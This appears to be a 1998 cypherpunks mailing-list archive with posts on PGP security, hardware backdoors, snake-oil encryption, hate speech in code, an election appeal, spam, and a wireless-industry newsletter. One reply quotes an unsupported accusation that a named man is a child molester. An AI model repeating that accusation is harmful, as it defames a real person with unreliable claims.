  The hottest items among techies is a browser called Opera.   
  This is a $40 shareware program that in speed and compact   
  size buts both IE and Communicator to shame.  It has a slightly   
  different interface from either of the majors - an interface some find    
  refreshing while other find less than useful.  As it's shareware, you can   
  try and then buy if you like it.  One reason for its speed is that it ignores   
  Java - the Internet's Bandwidth Pig (IBP).   
 
  The Rumor Mill by Paul Cassel
  ComputerScene Magazine  July 1998   
   
Forth executes code High-level at about 10% the speed of a compiled high-level
language.

Speed of execution of small applications is not effected by Forth's slow execution.

Reason is that initial code is written in high-level Forth.  

Inner loops are then translated into Forth assembler.

Speed is maintained with the advantage that data structures are created an maintained in
high-level language while the interactive operating system is retained for trouble shooting
both hardware and software problem.

Hardware cost of building the 80C32 the WEED KILLER boards is estimated at $10k.

Hardware design is estimated at 1 month labor at $50/hr for a total of $8k.

Software development on the 80C32 side in Forth and Forth assembler, software on the
Wintel side in Visual Basic and assembler, documentation, and training is estimated to
be 4 months for a total of $32k
   
 /\/\/\
end



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CF ASSOCIATES <FREE82698@yahoo.com>
Date: Tue, 1 Sep 1998 10:07:26 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: ...Are You In Need Of A Lifestyle Change...?
Message-ID: <419.436039.54271910FREE82698@yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain



Now for the first time ever you have the opportunity to join the most
extraordinary and most powerful wealth building program in the world!
Because of your desire to succeed, you have been given the opportunity
to take a close look at this program.

If you're skeptical, that's okay. Just make the call and see for
yourself.  My job is to inform you, your job is to make your own
decision.

If You Didn't Make $200,000.00 Last Year...

You  Owe  It  To  Yourself  And  Your  Family  To  Give  Our  Program
Serious Consideration!

Also, when you start making this kind of money within weeks, after
joining our team, you will actually learn how you can preserve it and
how to strategically invest it!

I invite you to call me for more details at 1-800-781-7046 Ext 1137.
This is a free 2 minute recording, so call right now!

Prosperous regards,

Steve Hollander
This Is Not Multi Level Marketing/Serious Inquiries Only

This is a one-time mailing. When you visited one of our webpages you indicated 
that you would be interested in this information, if not please excuse 
the intrusion and simply delete this message. 
Thank you















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 1 Sep 1998 10:08:04 -0700 (PDT)
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: BEWARE of SnakeOil (tm)
In-Reply-To: <199809010246.WAA26608@cti06.citenet.net>
Message-ID: <35EC2A76.2B83@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon wrote:
> 
> SNAKEOIL ALERT:
> Cc: Cypherpunks@toad.com
> 
> - beware of any product that has not been *extensively* peer-reviewed, with *all* the
> source code made public.  Security breaches are *very* easy to overlook and no software
> should *ever* be used unless it was peer-reviewed.
> 
I'm a bit surprised that I don't see quite as much concern expressed
about hardware. If security is the goal isn't HW part of the chain?
Yeah, yeah, I know, there was a blip a while ago about Intel chips, 
Microsoft kernels and keyboard snooping but it had a depressingly short
half-life. Seems to me it would be pretty easy to create rfi on a chip
and get products through FCC approval with NSA blessing. Hell, you could
probably put a good amount of FLASH on a chip and give the OS a nice
safe place to store snooped stuff. The security gaps that could be
created in an operating system are as numerous as scoundrels in
Parliament.

> They try pursue anybody who violates ITAR in a public way.  If I were to walk with a
> PGP diskette across the border outside Cana-USA, I would be liable under ITAR even if I
> never wrote a line of software in my life.
> 
Literally true but we all know the analogy of borders and speedbumps...

> All the govts have vested interest in disseminating pseudo-strong cryptography.  This
> statement is not paranoia, it is recent and regularly recurring history.
> 
Doesn't this seem to point to the need for products with a CP seal of
approval? HW/SW/Tools?

Mike

I think that in the secure communications world I would rather be a wolf
amongst sheep in wolfskins than a wolf in sheep's clothing. It would
reduce the chances of my hide being nailed to the barn door. What I'm
trying to say in a less than literate way is that the issue will only be
closed when there are $99 consumer products that implement secure
systems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Mon, 31 Aug 1998 19:11:43 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation in the upcoming Federal Election
Message-ID: <1.5.4.32.19980901011806.0084e2b4@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

Now that an election has been called your support in the lead up to and
during the Federal Election will be critical.

It is quite clear that the major parties are funded by big business at this
time and the people's party, Pauline Hanson's One Nation, will need to use
the will and common sense of the people to make an impact at this election.
We do not expect any favours from the mainstream media.

I would sincerely request that you take a stand against the current
political system that has not served us well and show your support by
contacting the people listed below by email or phone to see how you can help
at this critical time. As our mailing list now numbers over 10,000 please do
not send your request to me UNLESS you reside in the state of Queensland:

New South Wales - Phone: 02 9976 0283 (Manly Head Office)
Victoria - Phone: 03 5229 6535
Northern Territory - Phone/Fax: 08 8948 3537
Queensland: gwb@gwb.com.au
ACT - Email: petermac@netinfo.com.au 
S Australia - Email: robert@adl.auslink.net
W Australia - Email: martin@collective.com.au

Here are the important Internet addresses to follow:

ON-LINE NOW
One Nation Federal Web Page:
http://www.gwb.com.au/onenation/federal

One Nation Upper and Lower House Candidates:
http://www.gwb.com.au/onenation/federal/candi

There is a very active on-line forum with real time chat where you can
present issues directly to One Nation MPs and candidates. Follow
instructions from:
http://www.gwb.com.au/onenation/forum.html

>From Thursday evening (3rd September):
One Nation Tax Policy: 
http://www.gwb.com.au/tax.htm

Please feel free to print out policies and press releases freely and
encourage your friends to find out what One Nation really stands for by
copying and distributing this email.

Every vote will help.

GWB


Scott Balson
Pauline Hanson's Web Master





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Barry M <audiophile66@yahoo.com>
Date: Tue, 1 Sep 1998 12:03:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19980901190338.28710.rocketmail@send104.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain








_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pagewstuff <abcmgroup@bc.sympatico.ca>
Date: Tue, 1 Sep 1998 13:25:07 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809012024.NAA18437@mail1.bctel.ca>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.01C-SYMPA  (Win16; I)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pagewstuff <abcmgroup@bc.sympatico.ca>
Date: Tue, 1 Sep 1998 13:25:39 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809012025.NAA19524@mail1.bctel.ca>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pagewstuff <abcmgroup@bc.sympatico.ca>
Date: Tue, 1 Sep 1998 13:25:47 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809012025.NAA19697@mail1.bctel.ca>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lars Weitze" <chromedemon@netcologne.de>
Date: Tue, 1 Sep 1998 04:06:36 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Is it true that PGP 5.X is not secure?
Message-ID: <001001bdd5a0$b7cef800$7b0000c8@chrome>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There are still rumors about that...
ChromeDemon
- -- 
"One dead is a tragedy, thousand deads are a statistic."
        Karl Marx

e-mail: chromedemon@netcologne.de
http://chromedemon.home.pages.de
http://www.netcologne.de/~nc-weitzela2
-----BEGIN PGP SIGNATURE-----
Version: PGP 5.5.5

iQA/AwUBNevU0XnCsKPabtOfEQILcACfZ097WlD1pyA+2c7qv5RcyuYQJaEAoOmf
mvg3B9F9NNv7qrHljjgC1T+B
=J/8j
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 1 Sep 1998 10:06:57 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Meganet redux...
Message-ID: <D104150098E6D111B7830000F8D90AE824061F@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone want to educate these people as
to the general consensus on VME?


Peter

-------------------------------------
http://www.infoseek.com/Content?arn=BW0169-19980901&qt=RSA,+SDTI,+%22Securit
y+Dynamics%22,+Informix,+Xerox,+Tandem,+Encryption,+Cryptography,+Authentica
tion,+Certification,+%22University+of+Colorado%22&sv=IS&lk=&col=NX&kt=A&ak=n
ews1486

Multibillion-Dollar International Corporation
Purchases the 1-Million-Bit, Unbreakable
Virtual Matrix Encryption to Protect Its
Computers 
10:01 a.m. Sep 01, 1998 Eastern 

TARZANA, Calif.--(BUSINESS WIRE)--Sept. 1, 1998-- 

The $1.2 Million Challenge is Still Uncompromised After
Five Months 

Meganet Corp., which challenged Microsoft
(Nasdaq:MSFT), Intel (Nasdaq:INTC), Dell
(Nasdaq:DELL), AT&T (NYSE:ATT), NCR (NYSE:NCR)
and many other high-tech companies with its unbreakable
1-million-bit Virtual Matrix Encryption (VME), has sold and
installed Virtual Matrix Encryption at the headquarters of
La-Curacao, a multibillion-dollar international corporation. 
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Mon, 31 Aug 1998 04:45:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is Hate Code Speech?
Message-ID: <3.0.3.32.19980901132117.006bcad0@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: mcw@atreus.ncs.ncsc.mil
>Subject: Is Hate Code Speech?
>


>I acknowledge that you're welcome to use whatever variable names you
>want in code you write in private. BUt if you want to sell that code, it
>should be held to a standard of professionalism.
>

I think it is interesting that people are speaking of  the program as
something published for public consumption. Source code for commercial
products rarely goes public and compilers do a rather nice job of obscuring
human language variable names. Thus if there is any message or coherent
agenda in the source code it is highly unlikely that it will be detectable
in the executable, which is in fact the product delivered to the public.

Since the source code can only be read by insiders/employees then this does
tend to make it rather obvious that a form of speech was intended. I won't
rehash the fact that non-relevant, human-language-significant variable
names (as opposed to x, y, i, & j) are generally unacceptable programming
practice. I would make two points; that in todays programming world source
code is protected by copyright law as are other forms of expression legally
considered speech and source code is intended to document the process and
as such communicate ideas--in a broad sense this is a decent description of
speech, a written mode of communicating ideas. 

If someone finds offensive (hate) material in an obscured text (encrypted)
intended for limited distribution, does the encryption make it less
hateful? does the encryption make it any less a form of speech? does the
fact that distribution is limited (assumming the "target" is in the
distribution class) make it any less offensive? Is a crime less illegal if
it is hidden? (Be careful, on this one...)

I think that offensive, probably hateful, speech was intended. So the next
step (or for others, a previous step) is to decide whether there are legal
grounds for action. There are several laws which do, in fact, make these
activities illegal. Most people in the US today agree that overt racism is
wrong. Additionally, most "Americans" agree with laws that make it illegal
to use/perform "hateful" speech. 

These are very dangerous laws since they try to tread a very thin line
between the freedom of thoughts (and to some degree, actions) and injury to
others. When I first settled down to live in Spain and began to pay real
attention to the local political scene I was astonished to find people
defending the "right" of the radicals to throw stones and metal objects at
those persons expressing ideas contrary to theirs (pro-peace,
anti-terrorism demonstrations, 1995-6). Fortunately, we hear less and less
of this non-sense that physical harm to another is a valid form of personal
expression or speech. But the base problem lingers, where do we draw the
line of expression of ideas and intent to do harm. It has long been held
that shouting "fire" in a crowded building is not a protected form of
speech. Nor is libel (forgetting for now the problems of defining or
proving it). And where do we draw the line (or does it even matter?)
between public and private? And where do expression and action get
separated? Thinking about doing something, or telling some one about those
thoughts are not generally the same as actually doing it. But where does
thought become expression become action?

This case doesn't solely revolve around the speech issue...IMO, it also
revolves around the public/private issue, and whether or not the government
can rightfully "enter" a "private" business place to regulate these
matters. Recent history (80 years or so...) shows an increasing tendency
for the government to "protect" workers by regulating the workplace. There
are health & safety regs, minimum wage regs, etc. The "American" populace
has in general supported (and at times demanded) these external limits on
the "private" employer/employee relationship. Legal precedent exists.

There are two problems here and historically the government has been called
upon to keep a balance between "free speech" and "harmful speech" on the
one hand and "Privacy" and "Protection" on the other hand. The debate now
is with this case which way will (should?) the pendulum swing? More
protection (reduction of privacy), more freedom (or hateful speech)... 

Personally, I hope no one wins this eternal debate 100% since the results
would be disastrous.

Just some thoughts...

Albert P. Franco, II
encryption@apf2.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 1 Sep 1998 05:45:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is it true that PGP 5.X is not secure?
In-Reply-To: <001001bdd5a0$b7cef800$7b0000c8@chrome>
Message-ID: <35EBEC0F.3EE4869E@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Lars Weitze wrote:
>  
> There are still rumors about that...

My humble knowledge does not permit my answering your question.
However, I suppose your question is problematical. It is difficult
to define security, or more precisely a scientifcally rigorous
measure of security. I don't think that it is sensible to talk about 
absolute security without reference to a context (environment). In 
my view there is no 'perfect' encryption system in the practical
world. If by 'not secure' you meant something that malicious persons 
have secretely manipulated to cause you damage, then I also don't 
know but I guess that to be highly unlikely, given the good historical 
record of PGP. 

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 1 Sep 1998 13:43:19 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 1, 1998
Message-ID: <199809012041.PAA10746@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00010.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00010.bin"
Content-Description: "_CTIA_Daily_News_19980901a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPiZuYnNwOzwvQ0VOVEVS
PgoKPENFTlRFUj48VEFCTEUgQk9SREVSPTAgQ09MUz0yIFdJRFRIPSI2MDAi
ID4KPFRSPgo8VEQ+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+
PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20vaW1hZ2VzL2hvbWVo
ZWRfdGVzdC5naWYiIEFMVD0iV09XLUNPTS5DT00iIE5PU0FWRSBCT1JERVI9
MCBIRUlHSFQ9ODkgV0lEVEg9Mjc1PjwvQT48L1REPgoKPFREPgo8Q0VOVEVS
PjxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWxlc3NpdC5jb20iPjxJTUcgU1JD
PSJodHRwOi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9hcnRkcm9wLzB3aXJl
bGVzc2l0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3BvbnNvcmVkIGJ5IFdJ
UkVMRVNTIEkuVC4gOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NjAgV0lE
VEg9MjM0PjwvQT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NF
TlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJM
RSBCT1JERVI9MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5
Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElB
CkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDEsIDE5OTg8
L0ZPTlQ+PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNlbGx1
bGFyIFByb3ZpZGVycyBSYWNlCnRvIFByb3ZpZGUgTG9jYXRvciBUZWNobm9s
b2d5PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPkJlc2lkZXMgbWFraW5nIG1vYmlsZSBwaG9uZXMgbW9yZSB1c2VmdWwK
Zm9yIHJlcG9ydGluZyBlbWVyZ2VuY2llcywgbG9jYXRvciB0ZWNobm9sb2d5
IHByb3ZpZGVzIHRoZSBvcHBvcnR1bml0eQp0byBsb2FkIHVwIHdpcmVsZXNz
IHBob25lcyB3aXRoIGRhenpsaW5nIG5ldyBpbmZvcm1hdGlvbiBmZWF0dXJl
cyB0aGF0CndpbGwgYm90aCBjaGFuZ2UgdGhlIHdheSBwZW9wbGUgdXNlIHRo
ZW0gYW5kIHRoZSBpbmR1c3RyeSBtYXJrZXRzIHRoZW0uCig8QSBIUkVGPSJo
dHRwOi8vd3d3LnN1bi1zZW50aW5lbC5jb20vbW9uZXkvZGFpbHkvZGV0YWls
LzAsMTEzNiw2MDAwMDAwMDAwMDI2MTkyLDAwLmh0bWwiPk9STEFORE8KU1VO
IFNFTlRJTkVMPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+T21uaXBvaW50IHRvIExhdW5jaCBO
ZXcKUHJpY2luZyBQbGFuczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj5UaGUgY29tcGFueSB3aWxsIGludHJvZHVjZSBu
ZXcgcHJpY2luZwpwbGFucyBmb3IgaXRzIHByZXBhaWQgYW5kIGNyZWRpdCBj
dXN0b21lcnMgd2hpY2ggbWF5IGluY3JlYXNlIGl0cyBzdWJzY3JpYmVycwph
bmQgcmV2ZW51ZXMgcGVyIHN1YnNjcmliZXIuICg8QSBIUkVGPSJodHRwOi8v
Yml6LnlhaG9vLmNvbS9maW5hbmNlLzk4MDgzMS9vbW5pcG9pbnRfXzEuaHRt
bCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5Qb3dlcnRlbCBMYXVuY2hlcyBQcmUt
UGFpZApXaXJlbGVzcyBQQ1MgU2VydmljZTwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Qb3dlcnRlbCwgYSBQQ1MgcHJv
dmlkZXIgc2VydmluZyB0aGUgc291dGhlYXN0ZXJuClVuaXRlZCBTdGF0ZXMs
IHRvZGF5IGFubm91bmNlZCB0aGUgYXZhaWxhYmlsaXR5IG9mIHByZS1wYWlk
IFBDUyBzZXJ2aWNlcwppbiBhbGwgb2YgdGhlIGNvbXBhbnkncyAyNiBvcGVy
YXRpb25hbCBtYXJrZXRzLiBQb3dlcnRlbCwgSW5jLiwgaXMgbGljZW5zZWQK
dG8gcHJvdmlkZSB3aXJlbGVzcyBQQ1Mgc2VydmljZXMgaW4gbWFqb3IgY2l0
aWVzIGluY2x1ZGluZyBBdGhlbnMsIEF0bGFudGEsCkF1Z3VzdGEsIENvbHVt
YnVzLCBCaXJtaW5naGFtLCBDaGF0dGFub29nYSwgSmFja3NvbiwgSmFja3Nv
bnZpbGxlLCBLbm94dmlsbGUsCkxleGluZ3RvbiwgTG91aXN2aWxsZSwgTWFj
b24sIE1lbXBoaXMsIE5hc2h2aWxsZSBhbmQgU2F2YW5uYWguICg8QSBIUkVG
PSJodHRwOi8vYml6LnlhaG9vLmNvbS9idy85ODA5MDEvcG93ZXJ0ZWxfMS5o
dG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRvd2VyIEZhbGxzIFNob3J0IGZv
cgpQcmltZUNvPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPlByaW1lQ28gUENTIGhhcyB0aGUgcHJlbGltaW5hcnkgT0sg
Zm9yCmEgMTEwLWZvb3QgY29tbXVuaWNhdGlvbnMgdG93ZXIgbmVhciB0aGUg
Rml2ZSBGb3JrcyBpbnRlcnNlY3Rpb24gb2YgSmFtZXMKQ2l0eSBDb3VudHks
IFZpcmdpbmlhLCBidXQgYSBsYXdzdWl0IGZvciBhIHRhbGxlciB0b3dlciBp
cyBzdGlsbCBwZW5kaW5nCmluIGZlZGVyYWwgY291cnQuICg8QSBIUkVGPSJo
dHRwOi8vZGFpbHlwcmVzcy5jb20vbG9jYWwvc3Rvcmllcy8xY2VsbHRvd2Vy
My5odG0iPk5FV1BPUlQKTkVXUyBEQUlMWSBQUkVTUzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PlNwcmludCBVc2VzIENodXJjaCBCZWxsClRvd2VyIHRvIEhpZGUgQW50ZW5u
YSBTaXRlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPkluIGEgbW92ZSB0byBhdm9pZCBkaXNwdXRlcyB3aXRoIHJlc2lk
ZW50cywKU3ByaW50IFBDUyBoYXMgcHJvcG9zZWQgZGlzZ3Vpc2luZyBhIDcw
LWZvb3QgY29tbXVuaWNhdGlvbnMgcG9sZSBhcyBhIGNodXJjaApiZWxsIHRv
d2VyLiBBY2NvcmRpbmcgdG8gU3ByaW50IG9mZmljaWFscywgU3ByaW50IG5l
ZWRzIHRvIGVyZWN0IGEgdG93ZXIKaW4gdGhlIG5laWdoYm9yaG9vZCBvZiBG
YWl0aCBPdXRyZWFjaCBDZW50ZXIgaW4gSGFtcHRvbiwgVmEuLCB0byBjb3Zl
cgppdHMgc2VydmljZSBhcmVhIHRoZXJlOyBob3dldmVyLCB0aGVyZSBhcmUg
bm8gc3RydWN0dXJlcyB0aGF0IGFyZSB0YWxsCmVub3VnaCBmb3IgdGhlIHRv
d2VyLiBTcHJpbnQgaXMgbGVhc2luZyBsYW5kIGZyb20gY2h1cmNoIHBhc3Rv
ciBSZXYuIE1hc29uCkNsYXJrLiBUaGUgZmluYWwgZGVzaWduIGhhcyBub3Qg
YmVlbiBkZWNpZGVkLiBDb25mbGljdHMgYmV0d2VlbiByZXNpZGVudHMKYW5k
IHdpcmVsZXNzIGNvbXBhbmllcyBvdmVyIHRoZSBjb25zdHJ1Y3Rpb24gb2Yg
dG93ZXJzIGhhdmUgYWxyZWFkeSBhcmlzZW4KaW4gQ2hhcmxvdHRlc3ZpbGxl
LCBWaXJnaW5pYSBCZWFjaCwgQ2hlc3RlcmZpZWxkIENvdW50eSBhbmQgTm9y
dGhlcm4gVmlyZ2luaWEuJm5ic3A7Cig8QSBIUkVGPSJodHRwOi8vZGFpbHlw
cmVzcy5jb20vYXJjaGl2ZXMvNC9sb2NhbC9zdG9yaWVzLzFzdGVhbHRoYWxs
Lmh0bSI+TkVXUE9SVApORVdTIERBSUxZIFBSRVNTPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
TmV4dGVsIExhd3N1aXQgTGVhZHMKdG8gQXBwcm92YWwgb2YgRmxvcmlkYSBB
bnRlbm5hIFNpdGU8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+Q29jb251dCBDcmVlaywgRmxvcmlkYSBhdm9pZGVkIGEg
JDUgbWlsbGlvbgpsYXdzdWl0IHdoZW4gY2l0eSBjb21taXNzaW9uZXJzIGVz
c2VudGlhbGx5IHJldmVyc2VkIGEgdm90ZSBpbiBNYXkgdGhhdApiYW5uZWQg
YSBjb250cm92ZXJzaWFsIHdpcmVsZXNzIHBob25lIHRvd2VyIHRvIGJlIGJ1
aWx0LiAoPEEgSFJFRj0iaHR0cDovL3d3dy5zdW4tc2VudGluZWwuY29tL25l
d3MvZGFpbHkvZGV0YWlsLzAsMTEzNiw2MDAwMDAwMDAwMDI2MzY2LDAwLmh0
bWwiPk9STEFORE8KU1VOIFNFTlRJTkVMPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+R2Vvcmdp
YSBTdGF0ZSBQYXRyb2wKUGFydG5lcnMgd2l0aCBTb3V0aGVybiBMSU5DJm5i
c3A7PC9GT05UPjwvRk9OVD48L0I+Jm5ic3A7CjxCUj48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Zm9yIFdpcmVsZXNz
IENvbW11bmljYXRpb24KTmVlZHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
